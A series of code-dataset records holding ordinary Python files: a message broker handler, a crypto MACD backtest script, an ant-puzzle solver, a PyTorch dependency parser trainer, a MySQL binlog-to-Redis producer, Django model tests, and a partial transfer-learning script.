queues_to_subscribe:\n return {\n 'type': MESSAGE_TYPES.error,\n 'payload': \"No such queue!\"\n }\n for q in queues_to_subscribe:\n if q.endswith(\"_p\"):\n msg = yield from send_all(writer, reader, q, sub_id)\n else:\n QUEUES[q]['subs'].append((writer, reader, sub_id))\n msg = \"Subscribed to {}\".format(q)\n\n elif command == COMMANDS.disconnect:\n sub_id = message.get('sub_id')\n LOGGER.debug(\"Disconnected: %s\", sub_id)\n for q in QUEUES:\n for sub in QUEUES[q]['subs']:\n if sub[2] == sub_id:\n QUEUES[q]['subs'].remove(sub)\n del ALIVE[sub_id]\n del LWT[sub_id]\n msg = \"Disconnect OK\"\n\n elif command == COMMANDS.keep_alive:\n sub_id = message.get('sub_id')\n LOGGER.debug(\"Keep Alive from: %s\", sub_id)\n ALIVE[sub_id] = time.time()\n msg = \"Alive OK\"\n\n return {\n 'type': MESSAGE_TYPES.response,\n 'payload': msg\n }\n\n\n@asyncio.coroutine\ndef dispatch_message(message, writer, reader):\n message_type = message.get('type')\n if message_type != MESSAGE_TYPES.command:\n LOGGER.error('Got invalid message type %s', message_type)\n raise ValueError('Invalid message type. 
Should be %s' % (MESSAGE_TYPES.command,))\n # LOGGER.debug('Dispatching command %s', command)\n response = yield from handle_command(message, writer, reader)\n return response\n","sub_path":"src/notibroker/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616138880","text":"import pandas as pd\r\nfrom ta.trend import macd, macd_signal, macd_diff\r\nfrom ta.momentum import rsi\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cbpro\r\nimport datetime\r\nimport sys\r\n\r\npublic_client = cbpro.PublicClient()\r\n\r\ntrade_amount = 100\r\ncoins = [\"BTC-USD\", \"ETH-USD\", \"ADA-USD\", \"UNI-USD\", \"BCH-USD\", \"LTC-USD\", \"LINK-USD\", \"XLM-USD\", \"MATIC-USD\", \"ETC-USD\", \"EOS-USD\", \"AAVE-USD\", \"FIL-USD\", \"MKR-USD\", \"XTZ-USD\", \"ATOM-USD\", \"ALGO-USD\", \"COMP-USD\", \"DASH-USD\", \"ZEC-USD\", \"SNX-USD\", \"SUSHI-USD\", \"YFI-USD\", \"MANA-USD\", \"BAT-USD\", \"ENJ-USD\"]\r\ncoins = [\"FIL-USD\"]\r\n\r\ncurrent_status = pd.DataFrame()\r\n\r\nfor coin in coins:\r\n three_hundred_days_ago = (datetime.datetime.today().date() - datetime.timedelta(days=300)).strftime(\"%Y-%m-%d\")\r\n six_hundred_days_ago = (datetime.datetime.today().date() - datetime.timedelta(days=600)).strftime(\"%Y-%m-%d\")\r\n data = public_client.get_product_historic_rates(coin, granularity=86400)\r\n data2 =public_client.get_product_historic_rates(coin, six_hundred_days_ago, three_hundred_days_ago, granularity=86400)\r\n data = pd.DataFrame(data, columns=[\"time\", \"low\", \"high\", \"open\", \"close\", \"volume\"])\r\n data2 = pd.DataFrame(data2, columns=[\"time\", \"low\", \"high\", \"open\", \"close\", \"volume\"])\r\n data = data.append(data2)\r\n data[\"date\"] = pd.to_datetime(data[\"time\"], unit=\"s\")\r\n\r\n # plt.figure(figsize=(16,6))\r\n # plt.plot(data[\"date\"][:30], data[\"close\"][:30])\r\n\r\n df = data[[\"date\", \"close\"]][::-1]\r\n df[\"macd\"] = macd(df[\"close\"])\r\n df[\"macd_signal\"] = macd_signal(df[\"close\"])\r\n df[\"macd_diff\"] = macd_diff(df[\"close\"])\r\n df[\"rsi\"] = rsi(df[\"close\"])\r\n # plt.figure(figsize=(16, 6))\r\n # plt.plot(df[\"date\"][-50:], df[\"macd\"][-50:])\r\n # plt.plot(df[\"date\"][-50:], df[\"macd_signal\"][-50:])\r\n\r\n # plt.figure(figsize=(16,6))\r\n # plt.bar(df[\"date\"][-50:], df[\"macd_diff\"][-50:])\r\n\r\n # plt.figure(figsize=(16,6))\r\n # plt.plot(df[\"date\"], df[\"rsi\"])\r\n\r\n df2 = df.copy()\r\n df2 = df2.set_index(\"date\")\r\n df2 = df2[[\"macd_diff\"]]\r\n df2 = df2.shift(periods=1)\r\n main = df.merge(df2, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_x\"] < 0) & (main[\"macd_diff_x\"] > main[\"macd_diff_y\"])),\r\n ((main[\"macd_diff_x\"] > 0) & (main[\"macd_diff_x\"] < main[\"macd_diff_y\"])),\r\n ((main[\"macd_diff_x\"] > 0) & (main[\"macd_diff_y\"] < 0)) | ((main[\"macd_diff_x\"] < 0) & (main[\"macd_diff_y\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"today\"] = np.select(conditions, choices, default=\"DIV\")\r\n df4 = df.copy()\r\n df4 = df4.set_index(\"date\")\r\n df4 = df4[[\"macd_diff\"]]\r\n df4 = df4.rename(columns={\"macd_diff\": \"macd_diff_z\"})\r\n df4 = df4.shift(periods=2)\r\n main = main.merge(df4, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_y\"] < 0) & (main[\"macd_diff_y\"] > main[\"macd_diff_z\"])),\r\n ((main[\"macd_diff_y\"] > 0) & (main[\"macd_diff_y\"] < main[\"macd_diff_z\"])),\r\n ((main[\"macd_diff_y\"] 
> 0) & (main[\"macd_diff_z\"] < 0)) | ((main[\"macd_diff_y\"] < 0) & (main[\"macd_diff_z\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"yest\"] = np.select(conditions, choices, default=\"DIV\")\r\n df5 = df.copy()\r\n df5 = df5.set_index(\"date\")\r\n df5 = df5[[\"macd_diff\"]]\r\n df5 = df5.rename(columns={\"macd_diff\": \"macd_diff_a\"})\r\n df5 = df5.shift(periods=3)\r\n main = main.merge(df5, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_z\"] < 0) & (main[\"macd_diff_z\"] > main[\"macd_diff_a\"])),\r\n ((main[\"macd_diff_z\"] > 0) & (main[\"macd_diff_z\"] < main[\"macd_diff_a\"])),\r\n ((main[\"macd_diff_z\"] > 0) & (main[\"macd_diff_a\"] < 0)) | ((main[\"macd_diff_z\"] < 0) & (main[\"macd_diff_a\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"two_d_ago\"] = np.select(conditions, choices, default=\"DIV\")\r\n df6 = df.copy()\r\n df6 = df6.set_index(\"date\")\r\n df6 = df6[[\"macd_diff\"]]\r\n df6 = df6.rename(columns={\"macd_diff\": \"macd_diff_b\"})\r\n df6 = df6.shift(periods=4)\r\n main = main.merge(df6, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_a\"] < 0) & (main[\"macd_diff_a\"] > main[\"macd_diff_b\"])),\r\n ((main[\"macd_diff_a\"] > 0) & (main[\"macd_diff_a\"] < main[\"macd_diff_b\"])),\r\n ((main[\"macd_diff_a\"] > 0) & (main[\"macd_diff_b\"] < 0)) | ((main[\"macd_diff_a\"] < 0) & (main[\"macd_diff_b\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"three_d_ago\"] = np.select(conditions, choices, default=\"DIV\")\r\n main = main[[\"date\", \"close\", \"macd\", \"macd_signal\", \"macd_diff_x\", \"rsi\", \"today\", \"yest\", \"two_d_ago\", \"three_d_ago\"]]\r\n main = main.rename(columns={\"macd_diff_x\": \"macd_diff\"})\r\n future_price = df.copy()\r\n future_price = future_price.set_index(\"date\")\r\n future_price = future_price.shift(periods=-7)\r\n future_price = future_price[[\"close\"]]\r\n main = main.merge(future_price, on=\"date\")\r\n main = main.rename(columns={\"close_x\": \"close\", \"close_y\": \"future_price\"})\r\n conditions = [\r\n ((main[\"today\"]==\"BCONV\")|(main[\"today\"]==\"CROSS\"))&(main[\"yest\"]==\"BCONV\"),\r\n (main[\"today\"]==\"CROSS\")&(main[\"yest\"]==\"SCONV\")\r\n ]\r\n main[\"action\"] = np.select(conditions, [\"BUY\", \"SELL\"], \"\")\r\n remove_conseq = main.copy().set_index(\"date\").shift(periods=1)[[\"action\"]]\r\n main = main.merge(remove_conseq, on=\"date\")\r\n main[\"action\"] = np.where(main[\"action_x\"]==main[\"action_y\"],\"\",main[\"action_x\"])\r\n main = main[[\"date\", \"close\", \"macd\", \"macd_signal\", \"macd_diff\", \"rsi\", \"today\", \"yest\", \"two_d_ago\", \"three_d_ago\", \"action\"]]\r\n main.to_csv(\"main.csv\")\r\n\r\n main_action_days = main.loc[main[\"action\"].isin([\"BUY\", \"SELL\"])]\r\n remove_conseq = main_action_days.copy().set_index(\"date\").shift(periods=1)[[\"action\"]]\r\n main_action_days = main_action_days.merge(remove_conseq, on=\"date\")\r\n main_action_days[\"action\"] = np.where(main_action_days[\"action_x\"]==main_action_days[\"action_y\"],\"\",main_action_days[\"action_x\"])\r\n main_action_days = main_action_days.loc[main_action_days[\"action\"].isin([\"BUY\", \"SELL\"])]\r\n main_action_days[\"coin\"] = coin\r\n main_action_days = main_action_days.drop([\"action_x\", \"action_y\"], axis=1)\r\n try:\r\n if main_action_days.iloc[0][\"action\"] == \"SELL\":\r\n main_action_days = main_action_days[1:]\r\n except:\r\n pass\r\n # print(main_action_days)\r\n buys = 
main_action_days.loc[main_action_days[\"action\"]==\"BUY\"].reset_index()\r\n sells = main_action_days.loc[main_action_days[\"action\"]==\"SELL\"].reset_index()\r\n # print(buys)\r\n # print(sells)\r\n output = buys.merge(sells, left_index=True, right_index=True)\r\n output = output[[\"coin_x\", \"date_x\", \"close_x\", \"date_y\", \"close_y\"]].rename(columns={\"coin_x\": \"coin\", \"date_x\": \"buy_date\", \"close_x\": \"buy_price\", \"date_y\": \"sell_date\", \"close_y\": \"sell_price\"})\r\n output[\"profit\"] = (trade_amount/output[\"buy_price\"])*(output[\"sell_price\"]-output[\"buy_price\"])\r\n output.to_csv(\"output.csv\")\r\n # print(output)\r\n print(coin + \" PROFIT: \" + str(output[\"profit\"].sum()))\r\n main[\"coin\"] = coin\r\n current_status = current_status.append(main[-1:])\r\ncurrent_status.to_csv(\"current_status.csv\")","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"432841074","text":"def countNumOfUnique(int_list):\n \"\"\"Count number of diff int\n \n Arguments:\n int_list {[list of int]} -- [only odd or even ints]\n \n Returns:\n [int] -- [number of diff int]\n \"\"\"\n num_of_uniq = 0\n list_of_uniq = []\n for i in int_list:\n if (i not in list_of_uniq):\n list_of_uniq.append(i)\n num_of_uniq = num_of_uniq + 1\n \n return num_of_uniq","sub_path":"exercise/countNumOfUnique.py","file_name":"countNumOfUnique.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"426157678","text":"import operator\n\nclass Ant:\n\tdef __init__(self, p, r):\n\t\tself.t = 0\t\t # The local time for the ant\n\t\tself.p = p \t\t # The position of the ant\n\t\tself.op = p \t # The original position\n\t\tself.r = r \t\t # True if the ant is headed right\n\t\tself.alive = True # If the ant has fallen off or not\n\n\tdef age(self, t):\n\t\t\"\"\"\n\t\tWalk and age the ant t time units. 
Assumes no obstacles.\n\t\t\"\"\"\n\t\tself.t += t\n\t\tif self.r:\n\t\t\tself.p += t\n\t\telse:\n\t\t\tself.p -= t\n\n\tdef die(self):\n\t\t\"\"\"\n\t\tMarks the ant as fallen off the edge (or dead)\n\t\t\"\"\"\n\t\tself.alive = False\n\n\tdef turn(self):\n\t\tself.r = not self.r\n\n\tdef __str__(self):\n\t\treturn 'Ant(' + str(self.op) + \" - \" + str(self.p) + \" @ \" + str(self.t) + \", \" + ('R' if self.r else 'L') + ')'\n\ndef get_ants():\n\t\"\"\"\n\tReads the ants from stdin\n\t\"\"\"\n\ttry:\n\t\tline = input().split(' ')\n\t\tL, A = int(line[0]), int(line[1])\n\t\tants = []\n\t\tfor _ in range(A):\n\t\t\tline = input().split(' ')\n\t\t\tp, r = int(line[0]), line[1] == 'R'\n\t\t\tants.append( Ant(p, r) )\n\t\t# Make sure the ants are in order\n\t\tants.sort(key=operator.attrgetter('p'))\n\t\treturn L, ants\n\texcept EOFError:\n\t\tpass\n\treturn None, None\n\ndef printt(ants):\n\t\"\"\"\n\tPrints the ants array\n\t\"\"\"\n\tants = [str(a) for a in ants]\n\tprint(ants)\n\ndef is_path_clear(ants, i):\n\t\"\"\"\n\tDetermines if the path to the edge is clear or if you have to bump\n\tanother ant first.\n\t\"\"\"\n\tif ants[i].r:\n\t\treturn all(ants[k].r for k in range(i, len(ants)))\n\treturn all(not ants[k].r for k in range(i))\n\ndef distance_to_edge(L, ants, i):\n\t\"\"\"\n\tReturns the distance the i:th ant has left to the edge.\n\t\"\"\"\n\tif ants[i].r:\n\t\treturn L - ants[i].p\n\treturn ants[i].p\n\ndef get_neighbour(ants, i):\n\t\"\"\"\n\tReturns the neighbour the ant is looking at.\n\t\"\"\"\n\tif ants[i].r:\n\t\treturn i + 1\n\treturn i - 1\n\ndef bump(ants, i, k):\n\t\"\"\"\n\tBumps the two ants. Assumes they are at the same place in time.\n\t\"\"\"\n\t# Ants will meet at the very middle between them.\n\td = abs(ants[i].p - ants[k].p) / 2\n\t# Walk, or age, the ants\n\tants[i].age(d)\n\tants[k].age(d)\n\t# Since they bumped into eachother, turn them around\n\tants[i].turn()\n\tants[k].turn()\n\ndef sync(ants, i, k):\n\t\"\"\"\n\tAssumes the ants are moving towards eachother.\n\t\"\"\"\n\tdiff = ants[i].t - ants[k].t\n\tif diff >= 0:\n\t\t# The i:th ant has been alive longer, move other ant\n\t\tants[k].age(diff)\n\telse:\n\t\tants[i].age(-diff)\n\ndef walk(L, ants, i):\n\t\"\"\"\n\tWalks the i:th ant to the edge.\n\t\"\"\"\n\twhile ants[i].alive:\n\t\tclear_path = is_path_clear(ants, i)\n\t\tif clear_path:\n\t\t\td = distance_to_edge(L, ants, i)\n\t\t\tants[i].age(d)\n\t\t\tants[i].die()\n\t\t\treturn\n\t\t# We have to bump another ant first\n\t\tneighbour = get_neighbour(ants, i)\n\t\tif ants[neighbour].r == ants[i].r:\n\t\t\t# We are moving in the same direction and we have to turn the neighbour\n\t\t\t# around first.\n\t\t\twalk(L, ants, neighbour)\n\t\telse:\n\t\t\t# The ants are moving towards eachother, make sure they are\n\t\t\t# in the same timespan\n\t\t\tsync(ants, i, neighbour)\n\t\t\t# Bump the ants\n\t\t\tbump(ants, i, neighbour)\n\ndef get_last_ant(L, ants):\n\tfor i in range(len(ants)):\n\t\twalk(L, ants, i)\n\tfor i in reversed(range(len(ants))):\n\t\twalk(L, ants, i)\n\ndef get_oldest(ants):\n\t\"\"\"\n\tReturns the oldest ants\n\t\"\"\"\n\toldest = []\n\tfor a in ants:\n\t\tif oldest == [] or oldest[0].t <= a.t:\n\t\t\tif len(oldest) > 0 and oldest[0].t < a.t:\n\t\t\t\toldest = []\n\t\t\toldest.append(a)\n\toldest.sort(key=operator.attrgetter('op'))\n\treturn oldest\n\nwhile True:\n\tL, ants = get_ants()\n\tif L is None or ants is None:\n\t\tbreak\n\n\tget_last_ant(L, ants)\n\toldest = get_oldest(ants)\n\n\tt = oldest[0].t\n\tif (t * 
1.0).is_integer():\n\t\tt = int(t)\n\top = ' and '.join([ str(a.op) for a in oldest ])\n\n\tprint(\"The last ant will fall down in \" + str(t) + \" seconds - started at \" + op + \".\")\n","sub_path":"andrewant/andrewant.py","file_name":"andrewant.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"287501217","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom depparse.trans_based.parser_utils import load_and_preprocess_data\nfrom depparse.trans_based.parse import PartialParse\nfrom depparse.diagnosis import check_fault\nimport argparse\n\n\nclass HyperParam:\n lr = 1e-2\n momentum = 0.9\n batch_size = 32\n num_epoch = 200\n hidden_size = 200\n weight_decay = 10e-8\n gpu_id = 0\n\n\nclass TreeBank(Dataset):\n def __init__(self, example):\n self.ex = example\n self.num_ft = len(example[0][0])\n self.num_label = len(example[0][1])\n\n def __len__(self):\n return len(self.ex)\n\n def __getitem__(self, item):\n features, legal_labels, gt = self.ex[item]\n features = torch.LongTensor(features)\n legal_labels = torch.DoubleTensor(legal_labels)\n gt = int(gt)\n return {'feature': features, 'legal_label': legal_labels, 'gt': gt}\n\n\nclass NaiveParser(nn.Module):\n def __init__(self, embed_mat, num_ft, num_label, hidden_size=800):\n super(NaiveParser, self).__init__()\n self.embed = nn.Embedding.from_pretrained(embeddings=torch.from_numpy(embed_mat), freeze=False)\n self.len_embed_ft = num_ft * embed_mat.shape[1]\n self.fc1 = nn.Linear(self.len_embed_ft + num_label, hidden_size)\n self.fc2 = nn.Linear(hidden_size, num_label)\n\n def forward(self, feature, legal_label):\n embed_ft = self.embed(feature)\n embed_ft = embed_ft.view(-1, self.len_embed_ft)\n if embed_ft.dtype != legal_label.dtype:\n legal_label = legal_label.type_as(embed_ft)\n in_ft = torch.cat([embed_ft, legal_label], dim=-1)\n hidden = self.fc1(in_ft)\n # hidden = torch.tanh(hidden)\n hidden = hidden ** 3 # cube activation in {Chen & Manning, 2014}\n return self.fc2(hidden)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('f', type=str, help='The folder datasets are located.')\n parser.add_argument('--model-path', type=str, help='Where to save and load the model.')\n parser.add_argument('--lr', type=float, help='The learning rate.')\n parser.add_argument('--momentum', type=float, help='The momentum value.')\n parser.add_argument('--batch-size', type=int, help='The size of each batch.')\n parser.add_argument('--num-epoch', type=int, help='The number of epochs.')\n parser.add_argument('--hidden-size', type=int, help='The size of the hidden layer.')\n parser.add_argument('--weight-decay', type=float, help='The L2 regularization term.')\n parser.add_argument('--diagnosis-file', type=str, help='The file to output fault examples.')\n args = parser.parse_args()\n return args\n\n\ndef train_model(train_data, model, criterion, optimizer, device,\n scheduler=None, dev_data=None, batch_size=32, num_epoch=100):\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=4)\n if dev_data is not None:\n eval_data, parser = dev_data\n\n for epoch in range(num_epoch):\n model.train()\n if scheduler is not None:\n scheduler.step()\n epoch_loss = 0.0\n\n for sample in train_loader:\n feature, legal_label, gt = sample['feature'], sample['legal_label'], sample['gt']\n feature, 
legal_label, gt = feature.to(device), legal_label.to(device), gt.to(device)\n out = model(feature, legal_label)\n\n optimizer.zero_grad()\n loss = criterion(out, gt)\n loss.backward()\n optimizer.step()\n\n epoch_loss += loss.item()\n\n print('Training epoch {:03d}, loss is {:.4f}'.format(epoch, epoch_loss))\n if dev_data is not None:\n print('Evaluating on the development set...')\n prediction(model, eval_data, parser, device)\n print('\\n' + '=' * 40 + '\\n')\n return model\n\n\ndef prediction(model, data, parser, device):\n model.eval()\n with torch.set_grad_enabled(False):\n num_suc = 0\n num_correct = 0\n num_correct_label = 0\n num_total = 0\n\n for id, example in enumerate(data):\n ex = PartialParse(example)\n ex.safe_parse(model, parser, device)\n if not ex.success:\n continue\n num_suc += 1\n correct, n_words = ex.accuracy()\n num_correct += correct\n num_total += n_words\n if not parser.unlabeled:\n correct_label, _ = ex.accuracy(unlabeled=False)\n num_correct_label += correct_label\n\n print('Totally {:d} sentences, {:d} succeeded!'.format(len(data), num_suc))\n print('UAS: {:d} / {:d} = {:.4f}'.format(num_correct, num_total, num_correct / num_total))\n if not parser.unlabeled:\n print('LAS: {:d} / {:d} = {:.4f}'.format(num_correct_label, num_total, num_correct_label / num_total))\n\n\ndef main():\n args = parse_args()\n\n parser, embeddings_matrix, train_examples, dev_set, test_set = load_and_preprocess_data(\n reduced=False, data_path=args.f)\n train_data = TreeBank(train_examples)\n\n default = HyperParam()\n if args.lr is not None:\n default.lr = args.lr\n if args.momentum is not None:\n default.momentum = args.momentum\n if args.batch_size is not None:\n default.batch_size = args.batch_size\n if args.num_epoch is not None:\n default.num_epoch = args.num_epoch\n if args.hidden_size is not None:\n default.hidden_size = args.hidden_size\n if args.weight_decay is not None:\n default.weight_decay = args.weight_decay\n\n model = NaiveParser(embeddings_matrix, train_data.num_ft, train_data.num_label, hidden_size=default.hidden_size)\n\n # debug the model instead of training\n if args.diagnosis_file is not None:\n model.load_state_dict(torch.load(args.model_path))\n check_fault.diagnosing(model, test_set, parser, args.diagnosis_file)\n return\n\n # train the model and save it\n criterion = nn.CrossEntropyLoss()\n # optimizer = optim.SGD(params=model.parameters(), lr=default.lr, momentum=default.momentum)\n # exp_lr_scheduler = lr_scheduler.StepLR(optimizer=optimizer, step_size=default.num_epoch // 3, gamma=0.1)\n device = torch.device('cuda:{:d}'.format(default.gpu_id)\n if default.gpu_id >= 0 and torch.cuda.is_available() else 'cpu')\n model = model.to(device)\n optimizer = optim.Adagrad(params=model.parameters(), lr=default.lr, weight_decay=default.weight_decay)\n\n model = train_model(train_data, model, criterion, optimizer, device,\n dev_data=(dev_set, parser), batch_size=default.batch_size, num_epoch=default.num_epoch)\n model = model.to('cpu')\n\n if args.model_path is not None:\n torch.save(model.state_dict(), args.model_path)\n\n prediction(model, test_set, parser, 'cpu')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"depparse/trans_based/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261187804","text":"import json\n\nimport aioredis\nfrom asyncmy import connect\nfrom asyncmy.replication.binlogstream import BinLogStream\nfrom 
asyncmy.replication.row_events import DeleteRowsEvent, UpdateRowsEvent, WriteRowsEvent\nfrom dynaconf import Dynaconf\nfrom loguru import logger\n\nfrom fettler import constants\nfrom fettler.utils import JsonEncoder\n\n\nasync def run(settings: Dynaconf):\n mysql = settings.mysql\n redis = settings.redis\n max_len = redis.max_len or constants.STREAM_MAX_LEN\n redis = await aioredis.create_redis_pool(\n f\"redis://{redis.host}:{redis.port}\", db=redis.db, encoding=\"utf8\"\n )\n connect_kwargs = dict(\n host=mysql.host, port=mysql.port, user=mysql.user, password=mysql.password\n )\n conn = await connect(**connect_kwargs)\n ctl_conn = await connect(**connect_kwargs)\n stream = BinLogStream(\n connection=conn,\n ctl_connection=ctl_conn,\n resume_stream=True,\n blocking=True,\n only_events=[WriteRowsEvent, UpdateRowsEvent, DeleteRowsEvent],\n **settings.replication,\n )\n await stream.connect()\n logger.info(\n f\"Start producer success, listening on binlog from schemas {settings.replication.only_schemas}....\"\n )\n async for event in stream:\n if isinstance(event, DeleteRowsEvent):\n type_ = \"delete\"\n elif isinstance(event, WriteRowsEvent):\n type_ = \"create\"\n else:\n type_ = \"update\"\n msg = {\"schema\": event.schema, \"table\": event.table, \"rows\": event.rows, \"type\": type_}\n msg = json.dumps(msg, cls=JsonEncoder)\n await redis.xadd(constants.STREAM, {\"msg\": msg}, max_len=max_len)\n","sub_path":"fettler/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"429624209","text":"from unittest.mock import MagicMock\nfrom uuid import uuid4\n\nfrom django.test import SimpleTestCase, TestCase\n\nfrom casexml.apps.case.mock import CaseFactory, CaseIndex, CaseStructure\n\nfrom corehq.apps.domain.shortcuts import create_domain\nfrom corehq.form_processor.interfaces.dbaccessors import CaseAccessors\nfrom corehq.form_processor.models import Attachment\n\nDOMAIN = 'test-domain'\n\n\nclass AttachmentHasSizeTests(SimpleTestCase):\n def test_handles_no_size_property(self):\n raw_content = MagicMock(spec_set=[''])\n attachment = self.create_attachment_with_content(raw_content)\n self.assertFalse(attachment.has_size())\n\n def test_handles_None(self):\n raw_content = MagicMock(size=None, spec_set=['size'])\n attachment = self.create_attachment_with_content(raw_content)\n self.assertFalse(attachment.has_size())\n\n def test_handles_valid_size(self):\n raw_content = MagicMock(size=1024, spec_set=['size'])\n attachment = self.create_attachment_with_content(raw_content)\n self.assertTrue(attachment.has_size())\n\n @staticmethod\n def create_attachment_with_content(content):\n return Attachment(name='test_attachment', raw_content=content, content_type='text')\n\n\nclass TestIndices(TestCase):\n \"\"\"\n Verify that when two indices are created with the same identifier,\n CommCareCaseSQL.indices returns only the last one created.\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.domain_obj = create_domain(DOMAIN)\n cls.factory = CaseFactory(domain=DOMAIN)\n\n @classmethod\n def tearDownClass(cls):\n cls.domain_obj.delete()\n super().tearDownClass()\n\n def setUp(self):\n johnny_id = str(uuid4())\n nathaniel_id = str(uuid4())\n elizabeth_id = str(uuid4())\n (self.johnny_case,\n self.nathaniel_case,\n self.elizabeth_case) = self.factory.create_or_update_case(\n CaseStructure(\n case_id=johnny_id,\n attrs={\n 'create': True,\n 'case_type': 
'child',\n 'case_name': 'Johnny APPLESEED',\n 'owner_id': 'b0b',\n 'external_id': 'johnny12345',\n 'update': {\n 'first_name': 'Johnny',\n 'last_name': 'Appleseed',\n 'date_of_birth': '2021-08-27',\n 'dhis2_org_unit_id': 'abcdef12345',\n },\n },\n indices=[\n CaseIndex(\n CaseStructure(\n case_id=nathaniel_id,\n attrs={\n 'create': True,\n 'case_type': 'parent',\n 'case_name': 'Nathaniel CHAPMAN',\n 'owner_id': 'b0b',\n 'external_id': 'nathaniel12',\n 'update': {\n 'first_name': 'Nathaniel',\n 'last_name': 'Chapman',\n 'dhis2_org_unit_id': 'abcdef12345',\n },\n },\n ),\n relationship='child',\n related_type='parent',\n identifier='parent',\n ),\n CaseIndex(\n CaseStructure(\n case_id=elizabeth_id,\n attrs={\n 'create': True,\n 'case_type': 'parent',\n 'case_name': 'Elizabeth SIMONDS',\n 'owner_id': 'b0b',\n 'external_id': 'elizabeth12',\n 'update': {\n 'first_name': 'Elizabeth',\n 'last_name': 'Simonds',\n 'dhis2_org_unit_id': 'abcdef12345',\n },\n },\n ),\n relationship='child',\n related_type='parent',\n identifier='parent',\n )\n ],\n )\n )\n\n def test_case_indices(self):\n indices = self.johnny_case.indices\n self.assertEqual(len(indices), 1)\n\n case_accessor = CaseAccessors(DOMAIN)\n case = case_accessor.get_case(indices[0].referenced_id)\n self.assertTrue(are_cases_equal(case, self.elizabeth_case))\n\n\ndef are_cases_equal(a, b): # or at least equal enough for our test\n attrs = ('domain', 'case_id', 'type', 'name', 'owner_id')\n return all(getattr(a, attr) == getattr(b, attr) for attr in attrs)\n","sub_path":"corehq/form_processor/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44150826","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\n@author: gongxingfa\n@contact: xingfa.gong@wenba100.com\n@site: http://www.wenba100.com\n@software: PyCharm\n@file: transfer_learning.py\n@time: 2017/9/12 下午8:59\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\nimport time\nimport copy\nimport os\n\ndata_transforms = {'train': transforms.Compose([\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n]),\n 'val': transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n}\n# train训练集;val:验证集\ndata_dir = 'hymenoptera_data'\ndsets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\ndset_loaders = {x: torch.utils.data.DataLoader(dsets[x], batch_size=4, shuffle=True, num_workers=4) for x in\n ['train', 'val']}\n\ndset_size = {x: len(dsets[x]) for x in ['train', 'val']}\ndset_classes = dsets['train'].classes\n\n\ndef imshow(inp, title=None):\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n plt.pause(0.001) # pause a bit so that plots are updated\n\n\n# Get a batch of training data\ninputs, classes = next(iter(dset_loaders['train']))\n\n# Make a grid from 
 batch\nout = torchvision.utils.make_grid(inputs)\n\nimshow(out, title=[dset_classes[x] for x in classes])\n\n\ndef train_model(model, criterion, optimizer, lr_scheduler, num_epochs=25):\n    since = time.time()\n    best_model = model\n    best_acc = 0.0\n\n    for epoch in range(num_epochs):\n        print('Epoch {0}/{1}'.format(epoch, num_epochs - 1))\n        print('-' * 10)\n        for phase in ['train', 'val']:\n            if phase == 'train':  # training phase\n                optimizer = lr_scheduler(optimizer, epoch)\n                model.train(True)  # set the model to training mode\n            else:\n                model.train(False)  # set the model to evaluation mode\n            running_loss = 0.0\n            running_corrects = 0\n\n            for data in dset_loaders[phase]:\n                inputs, labels = data\n                inputs, labels = Variable(inputs), Variable(labels)\n                optimizer.zero_grad()\n\n                outputs = model(inputs)\n                _, preds = torch.max(outputs.data, 1)\n                loss = criterion(outputs, labels)\n                if phase == 'train':\n                    loss.backward()\n                    optimizer.step()\n                running_loss += loss.data[0]\n                running_corrects += torch.sum(preds == labels.data)\n\n            epoch_loss = running_loss / 